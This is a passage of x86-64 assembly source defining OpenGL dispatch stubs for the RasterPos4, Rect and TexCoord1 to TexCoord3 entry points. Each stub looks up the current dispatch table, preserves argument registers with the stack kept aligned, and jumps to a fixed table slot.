pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 672(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4s), .-GL_PREFIX(RasterPos4s)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4sv)
.type GL_PREFIX(RasterPos4sv), @function
/*
 * RasterPos4sv: dispatch stub, slot 85 (offset 680).  PTHREADS path
 * saves %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(RasterPos4sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 680(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4sv), .-GL_PREFIX(RasterPos4sv)
.p2align 4,,15
.globl GL_PREFIX(Rectd)
.type GL_PREFIX(Rectd), @function
/*
 * Rectd: dispatch stub, slot 86 (offset 688).  FP arguments in
 * %xmm0-%xmm3 are spilled across the table-fetch call; the frame is
 * 40 bytes (not 32) so %rsp stays 16-byte aligned at the call.
 */
GL_PREFIX(Rectd):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 688(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectd), .-GL_PREFIX(Rectd)
.p2align 4,,15
.globl GL_PREFIX(Rectdv)
.type GL_PREFIX(Rectdv), @function
/*
 * Rectdv: dispatch stub, slot 87 (offset 696).  Argument registers
 * %rdi/%rsi are preserved across the table-fetch call; %rbp is pushed
 * as padding so %rsp stays 16-byte aligned.
 */
GL_PREFIX(Rectdv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 696(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectdv), .-GL_PREFIX(Rectdv)
.p2align 4,,15
.globl GL_PREFIX(Rectf)
.type GL_PREFIX(Rectf), @function
/*
 * Rectf: dispatch stub, slot 88 (offset 704).  FP arguments in
 * %xmm0-%xmm3 are spilled across the table-fetch call; the 40-byte
 * frame keeps %rsp 16-byte aligned at the call.
 */
GL_PREFIX(Rectf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 704(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectf), .-GL_PREFIX(Rectf)
.p2align 4,,15
.globl GL_PREFIX(Rectfv)
.type GL_PREFIX(Rectfv), @function
/*
 * Rectfv: dispatch stub, slot 89 (offset 712).  Argument registers
 * %rdi/%rsi are preserved across the table-fetch call; %rbp is pushed
 * as padding so %rsp stays 16-byte aligned.
 */
GL_PREFIX(Rectfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 712(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectfv), .-GL_PREFIX(Rectfv)
.p2align 4,,15
.globl GL_PREFIX(Recti)
.type GL_PREFIX(Recti), @function
GL_PREFIX(Recti):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Recti), .-GL_PREFIX(Recti)
.p2align 4,,15
.globl GL_PREFIX(Rectiv)
.type GL_PREFIX(Rectiv), @function
GL_PREFIX(Rectiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 728(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectiv), .-GL_PREFIX(Rectiv)
.p2align 4,,15
.globl GL_PREFIX(Rects)
.type GL_PREFIX(Rects), @function
GL_PREFIX(Rects):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rects), .-GL_PREFIX(Rects)
.p2align 4,,15
.globl GL_PREFIX(Rectsv)
.type GL_PREFIX(Rectsv), @function
GL_PREFIX(Rectsv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 744(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectsv), .-GL_PREFIX(Rectsv)
/*
 * Dispatch stubs for the TexCoord1* entry points.  Each stub resolves
 * the current dispatch table (thread-local call, pthread lookup, or the
 * global _glapi_Dispatch with a lazy-init fallback), loads the slot at
 * a fixed byte offset, and tail-jumps to it.  Live SysV argument
 * registers are preserved across the nested lookup call; push counts
 * and spill-frame sizes are chosen to keep %rsp 16-byte aligned at
 * that call (on function entry %rsp % 16 == 8).
 */
/* TexCoord1d: one FP arg in %xmm0, spilled to an 8-byte frame; offset 752 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1d)
	.type GL_PREFIX(TexCoord1d), @function
GL_PREFIX(TexCoord1d):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 752(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $8, %rsp		/* 8-byte spill also 16-aligns %rsp */
	movq %xmm0, (%rsp)
	call _x86_64_get_dispatch@PLT
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 752(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f			/* table not yet initialized */
	movq 752(%rax), %r11
	jmp *%r11
1:
	subq $8, %rsp
	movq %xmm0, (%rsp)
	call _glapi_get_dispatch
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 752(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1d), .-GL_PREFIX(TexCoord1d)

/* TexCoord1dv: one pointer arg in %rdi; offset 760 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1dv)
	.type GL_PREFIX(TexCoord1dv), @function
GL_PREFIX(TexCoord1dv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 760(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi		/* single push keeps %rsp 16-aligned */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 760(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 760(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 760(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1dv), .-GL_PREFIX(TexCoord1dv)

/* TexCoord1f: one FP arg in %xmm0; offset 768 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1f)
	.type GL_PREFIX(TexCoord1f), @function
GL_PREFIX(TexCoord1f):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 768(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $8, %rsp
	movq %xmm0, (%rsp)
	call _x86_64_get_dispatch@PLT
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 768(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 768(%rax), %r11
	jmp *%r11
1:
	subq $8, %rsp
	movq %xmm0, (%rsp)
	call _glapi_get_dispatch
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 768(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1f), .-GL_PREFIX(TexCoord1f)

/* TexCoord1fv: one pointer arg in %rdi; offset 776 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1fv)
	.type GL_PREFIX(TexCoord1fv), @function
GL_PREFIX(TexCoord1fv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 776(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 776(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 776(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 776(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1fv), .-GL_PREFIX(TexCoord1fv)

/* TexCoord1i: one integer arg in %rdi; offset 784 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1i)
	.type GL_PREFIX(TexCoord1i), @function
GL_PREFIX(TexCoord1i):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 784(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 784(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 784(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 784(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1i), .-GL_PREFIX(TexCoord1i)

/* TexCoord1iv: one pointer arg in %rdi; offset 792 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1iv)
	.type GL_PREFIX(TexCoord1iv), @function
GL_PREFIX(TexCoord1iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 792(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 792(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 792(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 792(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1iv), .-GL_PREFIX(TexCoord1iv)

/* TexCoord1s: one integer arg in %rdi; offset 800 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1s)
	.type GL_PREFIX(TexCoord1s), @function
GL_PREFIX(TexCoord1s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 800(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 800(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 800(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 800(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1s), .-GL_PREFIX(TexCoord1s)

/* TexCoord1sv: one pointer arg in %rdi; offset 808 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord1sv)
	.type GL_PREFIX(TexCoord1sv), @function
GL_PREFIX(TexCoord1sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 808(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 808(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 808(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 808(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord1sv), .-GL_PREFIX(TexCoord1sv)
/*
 * Dispatch stubs for the TexCoord2* entry points.  Each stub resolves
 * the current dispatch table (thread-local call, pthread lookup, or the
 * global _glapi_Dispatch with a lazy-init fallback), loads the slot at
 * a fixed byte offset, and tail-jumps.  Live SysV argument registers
 * are preserved across the nested lookup call; push counts and spill
 * frame sizes keep %rsp 16-byte aligned at that call.
 */
/* TexCoord2d: two FP args in %xmm0-%xmm1, spilled to a 24-byte frame; offset 816 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2d)
	.type GL_PREFIX(TexCoord2d), @function
GL_PREFIX(TexCoord2d):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 816(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp		/* 16 bytes of spill + 8 alignment padding */
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 816(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f			/* table not yet initialized */
	movq 816(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 816(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2d), .-GL_PREFIX(TexCoord2d)

/* TexCoord2dv: one pointer arg in %rdi; offset 824 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2dv)
	.type GL_PREFIX(TexCoord2dv), @function
GL_PREFIX(TexCoord2dv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 824(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 824(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 824(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 824(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2dv), .-GL_PREFIX(TexCoord2dv)

/* TexCoord2f: two FP args in %xmm0-%xmm1; offset 832 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2f)
	.type GL_PREFIX(TexCoord2f), @function
GL_PREFIX(TexCoord2f):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 832(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 832(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 832(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 832(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2f), .-GL_PREFIX(TexCoord2f)

/* TexCoord2fv: one pointer arg in %rdi; offset 840 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2fv)
	.type GL_PREFIX(TexCoord2fv), @function
GL_PREFIX(TexCoord2fv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 840(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 840(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 840(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 840(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2fv), .-GL_PREFIX(TexCoord2fv)

/* TexCoord2i: two integer args (%rdi, %rsi); %rbp push is alignment padding; offset 848 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2i)
	.type GL_PREFIX(TexCoord2i), @function
GL_PREFIX(TexCoord2i):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 848(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 848(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 848(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 848(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2i), .-GL_PREFIX(TexCoord2i)

/* TexCoord2iv: one pointer arg in %rdi; offset 856 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2iv)
	.type GL_PREFIX(TexCoord2iv), @function
GL_PREFIX(TexCoord2iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 856(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 856(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 856(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 856(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2iv), .-GL_PREFIX(TexCoord2iv)

/* TexCoord2s: two integer args (%rdi, %rsi); offset 864 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2s)
	.type GL_PREFIX(TexCoord2s), @function
GL_PREFIX(TexCoord2s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 864(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 864(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 864(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 864(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2s), .-GL_PREFIX(TexCoord2s)

/* TexCoord2sv: one pointer arg in %rdi; offset 872 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord2sv)
	.type GL_PREFIX(TexCoord2sv), @function
GL_PREFIX(TexCoord2sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 872(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 872(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 872(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 872(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord2sv), .-GL_PREFIX(TexCoord2sv)
/*
 * Dispatch stubs for the TexCoord3* entry points.  Each stub resolves
 * the current dispatch table (thread-local call, pthread lookup, or the
 * global _glapi_Dispatch with a lazy-init fallback), loads the slot at
 * a fixed byte offset, and tail-jumps.  Live SysV argument registers
 * are preserved across the nested lookup call; push counts and spill
 * frame sizes keep %rsp 16-byte aligned at that call.
 */
/* TexCoord3d: three FP args in %xmm0-%xmm2, spilled to a 24-byte frame; offset 880 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3d)
	.type GL_PREFIX(TexCoord3d), @function
GL_PREFIX(TexCoord3d):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 880(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 880(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f			/* table not yet initialized */
	movq 880(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	call _glapi_get_dispatch
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 880(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3d), .-GL_PREFIX(TexCoord3d)

/* TexCoord3dv: one pointer arg in %rdi; offset 888 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3dv)
	.type GL_PREFIX(TexCoord3dv), @function
GL_PREFIX(TexCoord3dv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 888(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 888(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 888(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 888(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3dv), .-GL_PREFIX(TexCoord3dv)

/* TexCoord3f: three FP args in %xmm0-%xmm2; offset 896 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3f)
	.type GL_PREFIX(TexCoord3f), @function
GL_PREFIX(TexCoord3f):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 896(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 896(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 896(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	call _glapi_get_dispatch
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 896(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3f), .-GL_PREFIX(TexCoord3f)

/* TexCoord3fv: one pointer arg in %rdi; offset 904 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3fv)
	.type GL_PREFIX(TexCoord3fv), @function
GL_PREFIX(TexCoord3fv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 904(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 904(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
